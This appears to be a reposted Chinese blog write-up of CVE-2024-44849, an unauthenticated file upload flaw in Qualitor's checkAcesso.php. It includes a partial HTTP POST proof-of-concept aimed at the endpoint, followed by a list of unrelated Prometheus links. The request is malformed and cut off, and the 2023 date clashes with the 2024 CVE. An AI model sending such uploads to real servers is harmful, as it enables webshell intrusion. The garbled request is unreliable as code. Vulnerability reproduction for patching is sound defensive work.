博客
关于我
Qualitor checkAcesso.php 任意文件上传漏洞复现(CVE-2024-44849)
阅读量:803 次
发布时间:2023-03-03

本文共 591 字,大约阅读时间需要 1 分钟。

0x01 漏洞概述

Qualitor 8.24及之前版本存在严重的文件上传漏洞,这个漏洞未经身份验证,攻击者可利用此漏洞执行代码,创建WebShell,进一步控制服务器权限。该漏洞属于高风险级别,建议及时修复。

0x02 复现环境

此漏洞已被确认在以下环境中存在: - **Product Name**: Qualitor-Web - **Version Affected**: 8.24及之前版本

0x03 漏洞复现

以下是漏洞的PoC(Proof of Concept)代码,用于验证和分析: ```http POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849----------------------------- Content-Disposition: form-data; name="idtipo"2 ----------------------------- Content-Disposition: form-data; name="nmfilestorage" -

转载地址:http://wuxfk.baihongyu.com/

你可能感兴趣的文章
Prometheus 采集器使用详解
查看>>
Prometheus 黑盒监控实战
查看>>
prometheus+alertmanager+grafana监控部署教程
查看>>
Prometheus+Grafana构建智能化Kubernetes监控系统实战
查看>>
Prometheus+SpringBoot应用监控全过程详解
查看>>
Prometheus+SpringBoot应用监控全过程详解
查看>>
prometheus安装
查看>>
Prometheus实战教程:监控Kafka消息
查看>>
Prometheus实战教程:监控mysql数据库
查看>>
Prometheus实战教程:监控Nginx状态
查看>>
prometheus常用exporter下载地址大全
查看>>
Prometheus快速搭建与监控Linux系统实战
查看>>
prometheus报警与恢复告警的格式
查看>>
Pytorch中安装 torch_geometric 详细图文操作(全)
查看>>
prometheus监控docker容器实战
查看>>
Prometheus监控k8s集群使用邮箱和微信告警!
查看>>
Prometheus监控mysq数据库实战
查看>>
prometheus监控nginx实战
查看>>
Prometheus监控redis数据库实战
查看>>
Prometheus监控教程:使用Grafana展示主机基本信息
查看>>